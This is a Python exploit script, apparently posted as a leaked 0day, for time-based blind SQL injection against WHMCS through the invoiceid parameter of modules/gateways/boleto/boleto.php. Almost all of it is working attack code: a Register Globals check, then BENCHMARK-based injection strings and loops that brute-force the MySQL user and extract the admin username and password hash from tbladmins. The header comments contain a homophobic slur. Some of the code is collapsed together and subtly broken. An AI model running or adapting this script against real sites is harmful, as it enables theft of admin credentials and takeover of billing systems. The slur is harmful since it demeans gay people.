Simply checks for the vulnerable part
######################################### First found around September 2011~# Kept 0day because killing bugs is cruise control for gay.# Author: dx7r# fuck off.# if you use this now, you're a moron. lots of love.#######################################import urllib2import urllibimport os
def regglobcheck():regglob1 = urllib2.Request('[identificacao]=test')regglob2 = urllib2.urlopen(regglob1)regglob3 = regglob2.read().count('test')if regglob3 == 0:rgen = 0print " [+] Register Globals not enabled, no sqli on this whmcs install"elif regglob3 >= 1:rgen = 1print " [+] Register Globals enabled, own it."
This part is the actual exploit
######################################### First found around September 2011~# Kept 0day because killing bugs is cruise control for gay.# Author: dx7r# fuck off.# Name: fuq.whmcs.py# if you use this now, you're a moron. lots of love.######################################## coz sqlmap sux.import urllibimport urllib2import timeimport sys#####characters tool checks forusercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t',?'u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def usage(): print " [+] python "+ sys.argv[0] + " domain/path/to/whmcs"
if (len(sys.argv)< 2): usage() quit()
domain = sys.argv[1] #1' AND 9365=IF(SUBSTRING(current_user(),1,1) = CHAR(114),BENCHMARK(50000000,MD5(0x5767716d)),NULL) AND 'sIWA'='sIWA
#for i in range(0,len(usercharac)):# userascii.append(ord(usercharac[i]))#print userascii
#do check to see how long username is#then we have offset#1' AND 9365=IF(LENGTH(current_user()) = '14',BENCHMARK(50000000,MD5(0x5767716d)),NULL) AND 'sIWA'='sIWAdef lengthmysqluser(): global length found = 0 i = 1 length1 = urllib.quote_plus("1' AND 9365=IF(LENGTH(current_user()) = '") length2 = urllib.quote_plus("',BENCHMARK(50000000,MD5(0x5767716d)),NULL) AND 'sIWA'='sIWA") print " [+] Finding length of current user" while (found != 1):start = time.time()get = urllib2.Request('http://'+domain+'/modules/gateways/boleto/boleto.php?invoiceid=' + length1 + str(i) + length2)execute = urllib2.urlopen(get)elapsed = (time.time() - start)if(elapsed > 1):print " Length found at position: " + str(i)found = 1length = iprint urli = i + 1
def brutemysqluser(): print " [+] Time to start bruteforcing the username with a length of " + str(length) duser = [] i = 1 ascii = 1 length = length + 1 #so we can do a range(1,length) getuser1 = urllib.quote_plus("1' AND 9365=IF(SUBSTRING(current_user(),") getuser2 = urllib.quote_plus(",1) = CHAR(") getuser3 = urllib.quote_plus("),BENCHMARK(50000000,MD5(0x5767716d)),NULL) AND 'sIWA'='sIWA") for i in range(1,length):found = 0while(found != 1):for f in range(0,len(userascii)):start = time.time()url = 'http://'+domain+'/modules/gateways/boleto/boleto.php?invoiceid=' + getuser1 + str(i) + getuser2 + str(userascii[f]) + getuser3get = urllib2.Request(url)execute = urllib2.urlopen(get)elapsed = (time.time() - start)if (elapsed > 1):print " Character found. Character is: " + usercharac[f]duser.append(usercharac[f])found = 1 print " [+] Username found is: " sys.stdout.write(" [+] ") for i in range(0,len(duser)):sys.stdout.write(duser[i]) print "\n"
#lengthmysqluser()#brutemysqluser()#mysql> SELECT * FROM tblinvoices WHERE id='1' UNION SELECT IF(SUBSTRING(username,1,1)='a',BENCHMARK(50000000,MD5(0x5767716d)),NULL),2,3,4,5?,6,7,8,9,10,11,12,13,14,15,16 FROM tbladmins WHERE id=CHAR(49);#sqli string:#1' UNION SELECT IF(SUBSTRING(username,1,1)='a',BENCHMARK(50000000,MD5(0x5767716d)),NULL),2,3,4,5?,6,7,8,9,10,11,12,13,14,15,16 FROM tbladmins WHERE id=CHAR(49);#length#1' UNION SELECT IF(LENGTH(username) = '5',BENCHMARK(50000000,MD5(0x5767716d)),NULL),2,3,4,5,6,7,8,9,10,11,12,13,14,15,?16 FROM tbladmins WHERE id=CHAR(49);
def whmcsadminuser(length):#1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,IF(SUBSTRING(username,1,1)=CHAR(97),BENCHMARK(5?0000000,MD5(0x5767716d)),NULL),16 FROM tbladmins WHERE '1'='1print " [+] Time to start bruteforcing the username with a length of " + str(length)duser = []i = 1ascii = 1length = length + 1 #so we can do a range(1,length)getuser1 = urllib.quote_plus("1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,IF(SUBSTRING(username,")getuser2 = urllib.quote_plus(",1) = CHAR(")getuser3 = urllib.quote_plus("),BENCHMARK(50000000,MD5(0x5767716d)),NULL),16 FROM tbladmins WHERE '1'='1")for i in range(1,length):found = 0while(found != 1):for f in range(0,len(userascii)):start = time.time()url = 'http://'+domain+'/modules/gateways/boleto/boleto.php?invoiceid=' + getuser1 + str(i) + getuser2 + str(userascii[f]) + getuser3get = urllib2.Request(url)execute = urllib2.urlopen(get)elapsed = (time.time() - start)if (elapsed > 10):print " Character found. Character is: " + usercharac[f]duser.append(usercharac[f])found = 1print " [+] Username found is: "sys.stdout.write(" [+] ")for i in range(0,len(duser)):sys.stdout.write(duser[i])print "\n"
def whmcslength():print " [+] WHMCS exploit time! :)\n [+] Grabbing admin user length"found = 0i = 1length3 = urllib.quote_plus("1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,IF(LENGTH(username) = '")length4 = urllib.quote_plus("',BENCHMARK(50000000,MD5(0x5767716d)),NULL),16 FROM tbladmins WHERE '1'='1")while (found != 1):start = time.time()url2 = 'http://'+domain+'/modules/gateways/boleto/boleto.php?invoiceid=' + length3 + str(i) + length4get = urllib2.Request(url2)execute = urllib2.urlopen(get)elapsed = (time.time() - start)if(elapsed > 1):print " Length found at position: " + str(i)found = 1length = ii = i + 1 whmcsadminuser(length)
def whmcsadminpass(length):#1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,IF(SUBSTRING(username,1,1)=CHAR(97),BENCHMARK(5?0000000,MD5(0x5767716d)),NULL),16 FROM tbladmins WHERE '1'='1print " [+] Time to start bruteforcing the password hash with a length of " + str(length)duser = []i = 1ascii = 1length = length + 1 #so we can do a range(1,length)getuser1 = urllib.quote_plus("1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,IF(SUBSTRING(password,")getuser2 = urllib.quote_plus(",1) = CHAR(")getuser3 = urllib.quote_plus("),BENCHMARK(50000000,MD5(0x5767716d)),NULL),16 FROM tbladmins WHERE '1'='1")for i in range(1,length):found = 0while(found != 1):for f in range(0,len(userascii)):start = time.time()url = 'http://'+domain+'/modules/gateways/boleto/boleto.php?invoiceid=' + getuser1 + str(i) + getuser2 + str(userascii[f]) + getuser3get = urllib2.Request(url)execute = urllib2.urlopen(get)elapsed = (time.time() - start)if (elapsed > 1):print " Character found. Character is: " + usercharac[f]duser.append(usercharac[f])found = 1print " [+] Password hash found is: "sys.stdout.write(" [+] ")for i in range(0,len(duser)):sys.stdout.write(duser[i])print "\n"
def whmcspasslength():print " [+] Grabbing admin password length"found = 0i = 1length3 = urllib.quote_plus("1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,IF(LENGTH(password) = '")length4 = urllib.quote_plus("',BENCHMARK(50000000,MD5(0x5767716d)),NULL),16 FROM tbladmins WHERE '1'='1")while (found != 1):start = time.time()url2 = 'http://'+domain+'/modules/gateways/boleto/boleto.php?invoiceid=' + length3 + str(i) + length4get = urllib2.Request(url2)execute = urllib2.urlopen(get)elapsed = (time.time() - start)if(elapsed > 1):print " Length found at position: " + str(i)found = 1length = ii = i + 1 whmcsadminpass(length)
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